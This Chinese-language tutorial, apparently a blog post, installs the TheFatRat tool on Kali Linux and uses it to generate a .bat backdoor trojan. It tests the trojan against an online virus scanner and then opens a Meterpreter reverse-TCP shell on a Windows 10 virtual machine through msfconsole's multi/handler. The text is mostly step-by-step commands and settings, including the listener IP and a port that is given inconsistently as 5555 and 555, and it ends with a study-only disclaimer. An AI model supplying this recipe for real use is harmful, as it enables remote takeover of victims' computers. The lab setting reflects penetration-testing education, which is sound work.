一、主角TheFatRat安装教程
打开Kali后,在命令行中输入下列命名
1、git clone /Screetsec/TheFatRat.git
2、cd TheFatRat
3、apt install mingw-w64
4、chmod +x setup.sh
5、./setup.sh
6、chmod +x powerfull.sh
7、chmod +x fatrat
8、./fatrat
安装好后如下图所示
二、武器装备
装载虚拟机的电脑一台Win10虚拟机一个Kali Linux虚拟主机一个整装待发的小白一个三、战略安排
3.1 打开TheFatRat软件,输入6选择生成.bat的木马文件模块,如下图所示
命令:6
3.2 进入生成.bat文件的模块,输入1选择生成.bat文件,如下图所示。
命令:1
3.3 配置模块,输入监听IP地址、监听的端口、生成的.bat文件的存储路径以及.bat文件的名称,如下图所示。
命令:Set LHOST IP:192.168.0.102
Set LHOST Port:5555
backdoor
3.4 选择协议连接,输入3选择TCP协议连接,如下图所示。
命令:3
3.5 如下图,显示出你设置的信息,模块加载中。
3.6 模块加载完成,显示了.bat文件的存储目录,根据提示按回车键继续,如下图所示。
3.7 根据输出的目录,找到生成的.bat文件复制到Win10中,如下图所示。
3.8 如下图所示,生成的.bat文件已经复制到Win10主机中。
3.9 打开病毒检测网站,将.bat文件上传检测,如下图所示。
网址:/gui/home/upload
3.10 将.bat文件上传到目标网站,如下图所示。
3.11 观察生生成报告,如下图所示。
3.12 利用.bat文件,使用kali攻击win10主机
命令:msfconsole
3.13 msfconsole加载完成,如下图所示。
3.14 设置模块,如下图所示。
命令:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 555
run
3.15 输入sysinfo观察目标win10主机信息,入侵成功。
四、附录
4.1、这是声明
本文仅做学习交流,请自觉遵守网络安全法及相关法律法规!
